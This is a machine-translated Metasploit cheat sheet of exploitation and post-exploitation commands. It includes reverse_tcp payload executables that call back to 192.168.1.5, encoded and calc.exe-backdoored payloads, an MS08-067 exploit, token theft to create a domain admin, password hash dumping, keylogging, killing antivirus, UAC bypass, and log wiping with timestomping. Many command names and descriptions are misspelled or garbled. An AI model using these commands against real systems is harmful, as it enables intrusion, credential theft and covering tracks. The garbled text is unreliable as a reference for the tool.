Metasploit Common Commands

Service Apache2 Start

Service PostgreSQL Start

msfconsole Start

1.MSF Terminal commands

Show exploit

Lists all penetration attack modules in the Metasploit framework.

Show payloads

Lists all attack payloads in the Metasploit framework.

Show Auxiliary

Lists all the secondary attack modules in the Metasploit framework.

Search Name

Find all penetration attacks and other modules in the Metasploit framework.

Info

Displays information about the development of penetration attacks or modules.

Use name

Load a penetration attack or module.

Lhost

The IP address of the destination host link.

RHOST

Remote host or destination host.

Set function

Sets a specific configuration parameter.

SETG function

Sets a specific configuration parameter globally.

Show options

Lists all the parameter configurations in a penetration attack or module.

Show targets

Lists the target platforms supported by the penetration attack.

Set Target num

Specify the operating system and patch version type of the target you know.

Set payload

Specifies the attack payload you want to use.

Show advanced

Lists all advanced configuration options.

Set Autorunscript migrate-f.

After the infiltration attack is complete, it is automatically migrated to another process.

Check whether the target has a corresponding security vulnerability to the selected penetration attack

Exploit

Perform a penetration attack or module to attack the target.

Exploit-j

Infiltration attacks under Scheduled tasks (attacks will take place in the background)

Exploit-z

The infiltration attack succeeds without interacting with the session.

EXPLOIT-E Encoder

Develop the attack load coding method used

Exploit-h

Lists the help information for the exploit command.

Sessions-l

Lists the available interactive sessions (used when working with multiple shells)

Sessions-l-V

Lists all available interactive sessions and session details, such as which security vulnerability was used when attacking the system.

Sessions-s Script

Run a specific Meterpreter script in all active Meterpreter sessions.

Sessions-k

Kills all active interactive sessions.

Sessions-c cmd

Executes a command on all active Metaerpreter sessions.

Sessions-u SessionID

Upgrade a normal Win32shell to the Meterpreter shell.

Db_create Name

Create a database to be used by a database-driven attack.

Db_nmap

Use Nmap and store all the scanned databases in the database.

Db_autopwn-h

Displays the help information for the DB_AUTOPWN command.

Db_autopwn-p-R-E

Perform db_autopwn on all discovered open ports, attack all systems, and use a bounce shell.

Db_destroy

Deletes the current database.

Db_destroy User:[email protected]:p ort/database

Use the advanced option to delete the database.

2.metapreter command

Help

Open Help

Run ScriptName

Run the Meterpreter script, and in the Scripts/meterpreter directory, you can view all the script names.

SysInfo

Lists system information for the managed host.

Ls

Lists the file and folder information for the destination host.

Use Priv

Load the elevation of Privilege extension module to extend the Meterpreter library.

Ps

Displays all running processes and associated user accounts.

Migrate PID

Migrating to a specified process ID

Use Incognito

Load Inconito function (used to steal the target host's token or impersonate the user)

List_tokens-u

Lists the available tokens for the target host user group.

Impersonate_token Domain_name\\username

Impersonate a token that is available on the target host.

Steal_token

Steals the available tokens for a given process and makes a token impersonation.

Drop_token

Stop impersonating the current token.

Getsystem

Use various attack vectors to elevate user privileges to the system.

Shell

Run an interactive shell with all available tokens.

Execute-f Cmd.exe-i

Executes the Cmd.exe command and interacts.

Execute-f Cmd.exe-i-T

Executes the cmd command with all available tokens.

Execute-f cmd.exe-i-h-t

Executes the cmd command with all available tokens and hides the process.

Rev2self

Back to the initial user account that controls the target host.

Reg command

Interact in the target host registry, create, delete, and query operations.

Setdesktop number

Switch to another user interface (the feature is based on those users who are logged on).

Screenshot

To the screen of the target host.

Upload file

Uploads a file to the target host.

Download file

Download the file from the target host.

Keyscan_dump Stores Perhaps the keylogger on the target host.

Getprivs

Get the privileges on the target host as much as possible.

Uietl Enable Keyboard/mouse

Take over the target host's keyboard and mouse.

Background

Turn your current Meterpreter shell into a background execution.

Hashdump

Export the password hash value in the destination host.

Use sniffer

Load the sniffer module.

Sniffer_interfaces

Lists all open network interfaces for the target host.

Sniffer_dump InterfaceID Pcapname

Start sniffing on the target host.

Sniffer_start InterfaceID Packet_buffer

Initiates a sniffer on the target host for a specific range of packet buffers.

Sniffer_stats InterfaceID

Get statistics on the sniffing network interface being implemented

Sniffer_stop InterfaceID

Stop sniffing.

Add_user username password-h IP

Add a user on the remote destination host.

Add_group_user "Domain adimins" Username-h IP

Add the user to the Domain Admins group of the target host.

Clearev

Clears the log records on the target host.

Timestomp

Modify file properties, such as modifying the creation time of a file (reverse forensics adjustment).

Reboot

Restart the target host.

3.MSFpayload command

Msfpayload-h

Msfpayload's help information.

Msfpayload windows/meterpreter/bind_tcp O

Lists all available attack payloads.

Msfpayload windows/metarpreter/bind_tcp O.

Lists the configuration items for all Windows/meterpreter/bind_tcp under attack load (any attack payload is configurable).

Msfpayload windows/metaerpreter/reverse_tcp lhost=192.168.1.5 lport=443 X>payload.exe

Create a Metarpreter reverse_tcp attack load back to port 443 of 192.168.1.5 and save it as a Windows executable named Payload.exe.

Msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.5 lport=443 R>payload.ray

Generate the same attack payload as above, into the original format of the file, the file will be used in the following msfencode.

Msfpayload windows/meterpreter/bind_tcp lport=443 C>PAYLOAD.C

Generate the same attack payload as above, but export to shellcode in C format.

Msfpayload windows/meterpreter/bind_tcp lport=443 J>payload.java

Exported as a JavaScript language string in%u encoding.

4.MSFencode command

Msfencode-h

Lists the help information for Msfencode.

Msfencode-l

Lists all the available encoders.

Msfencode-t (C,eif.exe,java,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)

Displays the format of the encoded buffer.

Msfencode-i payload.raw-o encoded_payload,exe-e x86/shikata_ga_nai-c 5-t exe

Use the Shikata_nai encoder to encode the Payload.raw file 5 times, and then export a file named Encoded_payload.exe.

Msfpayload windows/meterpreter/bind_tcp lport=443 r|msfencode-e x86/_countdown-c 5-t raw|msfencode-e x86/shikata_ga_n Ai-c 5-t Exe-o Multi-encoded_payload.exe

Creates an attack payload that is nested encoded in multiple encoded formats.

Msfencode-i Payload.raw bufferregister=esi-e x86/alpha_mixed-t C

Creates a pure alphanumeric shellcode, which is directed to Shellcode by the ESI register and output in the C language format.

5.MSFCLI command.

MSFCLI | grep exploit

Only the penetration attack module is listed.

MSFCLI | grep exploit/windows

Lists only the penetration attack modules associated with Windows.

MSFCLI exploit/windows/smb/msf08_067_netapi pyaload=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E

The 172.16.32.142 initiated a MS08_067_NETAPI infiltration attack, configured a bind_tcp attack payload, and was bound to 443 ports for monitoring.

6.Metasploit Advanced Forbearance

Msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.5 lport=443 r|msfencode-x calc.exe-k-o payload.exe-c x86/s Hikata_ga_nai-c 7-t exe

Create a bounce-meterpreter attack payload, back to the 443 port of the 192.168.1.5 host, and use calc.exe as the load backdoor to keep the load execution stream running in the attacked application, and finally generating the. Shikata_ga_ The attack payload after the NAI encoder is encoded can execute the program Payload.exe.

Msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.5 lport=443 r|msfencode-x calc.exe-o payload.exe-e x86/ Shikata_ga_nai-c 7-t exe

Create a bounce-meterpreter attack payload, Back to the 443 port of the 192.168.1.5 host, use calc.exe as the load backdoor to keep the load execution stream from running in the attacked application, and no more information will pop up on the target host after the attack payload is executed. This configuration is useful when you control a remote host through a browser vulnerability and do not want the computer program to open before the target user, and, similarly, the last generation of the. Shikata_ga_nai encoded attack load program Payload.exe.

Msfpayload windows/meterpreter/bind_tcp lport=443 r|msfencode-0 payload.exe-e x86/shikata_ga_nai-c 7 EXE & & MS FCLI Multi/bandler payload=windows/meterpreter/bind_tcp lport=443 E

Create a raw-format bind_tcp mode Meterpreter attack payload, encode 7 times with Shikata_ga_nai, output a Windows executable file named Payload.exe, and enable multi-way listening to execute.

7.MSFvenom

Use Msfvenom, a set of kits, to create and encode your attack payload.

Msfvenom--payload

Windows/meterpreter/reverse_tcp--format exe--encoder x86/shikata_ga_nai lhost=172.16.1.32 LPORT=443 > Msf.exe

[*] X86/shikata_ga_nai succeeded with size 317 (iteration=1)

root://opt/framework3/msf3#

This line of command can create an attack payload and automatically generate an executable file format.

8.Meterpreter post-Infiltration attack phase command.

Use Metarpreter on Windows hosts for power-up operations.

Meterpreter>use Priv

Meterpreter>getsystem

Steals a Domain Admins group token from a given process ID, adds a domain account, and adds the domain account to the Domain Admins group.

Meterpreter>ps

Meterpreter>steal_token 1784

Meterpreter>shell

C:\windows\sysem32>user Metasploit @password/add/domain

C:\windows\sysem32>net Group "Domain Admins" Metasploit/add/domain

The hash value of the password is exported from the SAM database.

Meterpreter>use Priv

Meterpreter>getsystem

Meterpreter>hashdump

Tip: In WIDONWS 2008, if the Getsystem command and the hashdump command throw an exception, you need to migrate to a process that runs under system privileges.

Automatically migrated to a separate process.

Meterpreter>run Migrate

Kill the antivirus process that the target host is running through Meterpreter's Killav footsteps.

Meterpreter>run Kallav

Capture the keylogger on the target host for a specific process:

Meterpreter>ps

Meterpreter>migrate 1436

Meterpreter>kayscan_start

Meterpreter>kayscan_start

Meterpreter>keyscan_dump

Meterpreter>kayscan_stop

To impersonate an administrator using anonymous methods:

Meterpreter>use Incognito

Meterpreter>list_tokens-u

Meterpreter>use Priv

Meterpreter>getsystem

Meterpreter>list_tokens-u

Meterpreter>impersonate_token Ihazsecurity\\admininistrator

Check that the target hosts have taken precautionary measures, listed the Help menu, turned off the firewall, and other protections we found.

Meterpreter>run getcountermeasure

Meterpreter>run getcountermeasure-h

Meterpreter>run getcountermeasure-d-K

Identify whether the host being controlled is a virtual machine.

Meterpreter>run CHECKVM

Use the cmd shell in a Meterpreter session interface.

Meterpreter>shell

Gets the graphical interface (VNC) of the target host.

Meterpreter>run VNC

Causes the running Meterpreter interface to run in the background.

Meterpreter>background

Bypasses the Windows User Account Control (UAC) mechanism.

Meterpreter>run Post/windows/escalate/bypassuac

Export the password hash of the Apple Os-x system.

Meterpreter>run Post/osx/gather/hashdump

Export the password hash for the Linux system.

Meterpreter>run Post/linux/gather/hashdump

Metasploit Common Commands